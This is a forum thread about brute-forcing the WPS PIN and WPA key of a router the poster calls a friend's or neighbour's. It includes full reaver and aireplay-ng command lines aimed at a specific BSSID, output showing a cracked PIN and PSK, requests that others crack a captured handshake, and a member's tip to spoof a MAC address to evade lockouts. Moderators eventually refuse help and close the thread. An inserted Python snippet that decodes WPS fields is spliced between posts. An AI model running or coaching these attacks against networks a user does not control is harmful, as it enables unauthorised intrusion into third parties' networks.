July 25, 2017, 07:51:04 AM
Author Topic: handshake found bruteforce && Reaver Ap limit  (Read 10230 times)

Offline TAPE

  • Top Hat Member Moderator
  • Elite
  • ********
  • Posts: 1247
  • Internets: +192/-0
Re: handshake found bruteforce && Reaver Ap limit
« Reply #15 on: November 16, 2013, 03:33:55 AM »
Your 'friend' should be kind enough to simply offer you the password without you needing to disrupt his/her network by trying to crack it..
Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik

Offline d??????????4????????????r???????k?????????????c???????????a?

  • Experienced
  • ***
  • Posts: 224
  • Internets: +89/-1
Re: handshake found bruteforce && Reaver Ap limit
« Reply #16 on: November 16, 2013, 03:34:51 AM »
sounds legit, i'll go and read about how to do that and get back to you..

Offline maverikxxx

  • Prospect
  • *
  • Posts: 14
  • Internets: +1/-1
Re: handshake found bruteforce && Reaver Ap limit
« Reply #17 on: November 16, 2013, 07:47:07 AM »
For Tape: yes, I study medicine my friend work....The challenge decided him .....

In a week I was able to learn a lot; in fact, I did a lot of testing on my network.
Whoever wants to help me, write to me in private so I can send you the 4-way handshake file.
Thanks, guys

Offline maverikxxx

  • Prospect
  • *
  • Posts: 14
  • Internets: +1/-1
Re: handshake found bruteforce && Reaver Ap limit
« Reply #18 on: November 16, 2013, 07:58:39 AM »
Report Reaver

hw Centrino intel 512 ram
alfa network awus036nh and alfa network awus036h

root@bt:~# reaver -i mon0  -b B8:A3:86:E7:XX:XX  -vv -L

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session for B8:A3:86:E7:XX:XX? [n/Y] n
  • Waiting for beacon from B8:A3:86:E7:XX:XX
  • Switching mon0 to channel 1
  • Switching mon0 to channel 2
  • Switching mon0 to channel 3
  • Switching mon0 to channel 6
  • Associated with B8:A3:86:E7:D8:F0 (ESSID: za_Home)
  • Trying pin 12345670
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received M5 message
  • Sending M6 message
  • Received M7 message
  • Sending WSC NACK
  • Sending WSC NACK
  • Pin cracked in 39 seconds
  • WPS PIN: '12345670'
  • WPA PSK: 'A22092CED44E050AF9363EE8129277F4276F3462FEA36D0EF8A411C154E7B4EF'
  • AP SSID: 'Network-b8a386e7d8f0'
  • Nothing done, nothing to save.

root@bt:~#
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
B8:A3:86:E7:XX:XX       6            -47        1.0               No                za_Home
« Last Edit: November 16, 2013, 08:52:09 AM by maverikxxx »

Offline 0E 800

  • If something can corrupt you, you're corrupted already.
  • Top Hat Member
  • Elite
  • ********
  • Posts: 961
  • Internets: +154/-0
Re: handshake found bruteforce && Reaver Ap limit
« Reply #19 on: November 16, 2013, 09:59:12 AM »
I see you got alfa network awus036nh and alfa network awus036h, which one are you using on mon0?

Also, the ESSID is stated to be za_Home, but at the bottom it says it's Network-b8a386e7d8f0.

I would try booting from a pentest livecd/liveusb and try running the reaver attack from live and see if your output changes or stays the same. Also, if it really is your 'friend and neighbor' go get the make and model of the AP and post that back.
"He who passes not his days in the realm of dreams is the slave of the days."

Offline maverikxxx

  • Prospect
  • *
  • Posts: 14
  • Internets: +1/-1
Re: handshake found bruteforce && Reaver Ap limit
« Reply #20 on: November 16, 2013, 01:09:52 PM »
1. I use awus036nh, more sensitive
2. Network-b8a386e7d8f0 and pin 12345670 is fake?
3. Netgear WGR614

I try to use this command

aireplay-ng mon0 -1 120 -a B8:A3:86:E7:D8:F0 -e za_home -q 5
reaver -i mon0 -c 6 -A -b B8:A3:86:E7:D8:F0 -vv -N -w -t 5 -L -x -d 0 -r 5:3 -S


Offline 0E 800

  • If something can corrupt you, you're corrupted already.
  • Top Hat Member
  • Elite
  • ********
  • Posts: 961
  • Internets: +154/-0
Re: handshake found bruteforce && Reaver Ap limit
« Reply #21 on: November 16, 2013, 06:20:38 PM »
Please review: https://code.google.com/p/reaver-wps/issues/detail?id=23

"Netgears are known to implement lockouts. Some only lock you out for 5 minutes, some may lock you out longer, or even indefinitely."

You might try spoofing your MAC address and see if you get different results. Or change your MAC to that of one already associated with the AP. Also, as they state in the above link, you might try installing the latest reaver from svn or git.
"He who passes not his days in the realm of dreams is the slave of the days."

Offline corr.x86

  • Top Hat Member
  • Elite
  • ********
  • Posts: 1111
  • Internets: +10/-0
  • ^That's a lie
Re: handshake found bruteforce && Reaver Ap limit
« Reply #22 on: November 16, 2013, 07:53:44 PM »
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=WPSIG

Here's something that might help you figure something out... Just saw a twit of it today.
"I have this assignment bla bla bla, can you give me teh codez?"

"www.adoptamalware.com would be a nice website to run."

Offline maverikxxx

  • Prospect
  • *
  • Posts: 14
  • Internets: +1/-1
Re: handshake found bruteforce && Reaver Ap limit
« Reply #23 on: November 17, 2013, 12:38:06 AM »
Hi guys ,
today the girl breaks the balls  :'(   .....
I try all the solutions on Monday evening.
However, I have the latest version 1.4 of reaver and I have already tried to change my MAC, but without result.
I have the handshake; can we do something? Thank you

Offline maverikxxx

  • Prospect
  • *
  • Posts: 14
  • Internets: +1/-1
Re: handshake found bruteforce && Reaver Ap limit
« Reply #24 on: November 18, 2013, 08:38:27 AM »
[B8:A3:86:E7:D8:F0] - 'za_Home'
D-Link International (oui.txt vendor)
WPS Information
  * Device Name: 'AyecomWPSAP'
  * Wi-Fi Protected Setup State: 'Not Configured'
  * UUID-E: '00000000000010000000B8A386E7D8F0'
  * Response Type: 'AP'
  * Primary Device Type: 'Network Infrastructure - AP'
  * Model Number: 'DSL2740'
  * AP Setup Locked: '\x01'
  * Serial Number: '12345'
  * Version: '\x10'
  * RF Bands: '\x03'
  * Model Name: 'AyecomWAP'
  * Vendor Extension: '\x00$\xe2`\x02\x00\x01\x01`\x00\x00\x02\x00\x01`\x01\x00\x02\x00\x01'
  * Config Methods: '\x01\xae'
  * Manufacturer: 'Ayecom'

The router is Ayecom
I tried everything with reaver but it does not work; the signal is good.
This is the cap file
« Last Edit: November 18, 2013, 09:54:03 AM by TAPE »
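
As an added example (not part of the thread, and not code from the tool that produced the dump), this Python code decodes the raw fields of a WPS information listing like the one posted above, so that an AP owner can read which WPS methods the device advertises and whether it reports itself as locked. The bit names follow the Wi-Fi Simple Configuration spec; the function names and the sample text are constructed here.

```python
import ast
import re

# Config Methods bits from the Wi-Fi Simple Configuration spec, low bit first.
CONFIG_METHODS = {
    0x0001: "USBA", 0x0002: "Ethernet", 0x0004: "Label", 0x0008: "Display",
    0x0010: "External NFC Token", 0x0020: "Integrated NFC Token",
    0x0040: "NFC Interface", 0x0080: "PushButton", 0x0100: "Keypad",
}
PIN_METHODS = {"Label", "Display", "Keypad"}   # methods that involve a PIN
RF_BANDS = {0x01: "2.4 GHz", 0x02: "5 GHz"}

# Constructed sample: some of the fields from the dump posted above.
SAMPLE = r"""
  * Wi-Fi Protected Setup State: 'Not Configured'
  * AP Setup Locked: '\x01'
  * Version: '\x10'
  * RF Bands: '\x03'
  * Config Methods: '\x01\xae'
"""

def parse_fields(text):
    """Return {field name: decoded value} for each "* Name: 'value'" line."""
    fields = {}
    for m in re.finditer(r"^\s*\*\s*(.+?):\s*('.*'|\".*\")\s*$", text, re.M):
        # Values are printed as Python string literals; decode \xNN escapes.
        fields[m.group(1)] = ast.literal_eval(m.group(2))
    return fields

def as_int(value):
    """Read a decoded field as a big-endian integer (empty field -> 0)."""
    return int.from_bytes(value.encode("latin-1"), "big")

def audit(text):
    """Summarise the WPS exposure an AP advertises in its beacon/probe data."""
    f = parse_fields(text)
    cfg, ver = as_int(f.get("Config Methods", "")), as_int(f.get("Version", ""))
    methods = [name for bit, name in CONFIG_METHODS.items() if cfg & bit]
    return {
        "version": f"{ver >> 4}.{ver & 0x0F}",
        "state": f.get("Wi-Fi Protected Setup State"),
        "setup_locked": bool(as_int(f.get("AP Setup Locked", ""))),
        "bands": [n for b, n in RF_BANDS.items() if as_int(f.get("RF Bands", "")) & b],
        "methods": methods,
        "pin_methods_advertised": sorted(PIN_METHODS.intersection(methods)),
    }

if __name__ == "__main__":
    for key, value in audit(SAMPLE).items():
        print(f"{key}: {value}")
```

On an AP you administer, a locked state or any advertised PIN method is a cue to turn WPS off in the device settings.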

Offline 0E 800

  • If something can corrupt you, you're corrupted already.
  • Top Hat Member
  • Elite
  • ********
  • Posts: 961
  • Internets: +154/-0
Re: handshake found bruteforce && Reaver Ap limit
« Reply #25 on: November 18, 2013, 09:25:16 AM »
I am no longer able to help you with this as you are not following the rules and guidelines as suggested by GalaxyNinja or the advice by TAPE. THS Forum is all for education about network penetration testing and in my opinion not about submitting files to be cracked by other members. 

I would suggest that you perform reaver exploits on your own APs and should accept the possibility that your neighbor's router (for whatever reason) is not vulnerable to the WPS exploit.

This thread should be closed, any further inquiry should be done by pm.
« Last Edit: November 18, 2013, 09:51:18 AM by 0E 800 »
"He who passes not his days in the realm of dreams is the slave of the days."

Offline TAPE

  • Top Hat Member Moderator
  • Elite
  • ********
  • Posts: 1247
  • Internets: +192/-0
Re: handshake found bruteforce && Reaver Ap limit
« Reply #26 on: November 18, 2013, 09:54:41 AM »
Agreed and so it shall be.

Thread closed.
Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik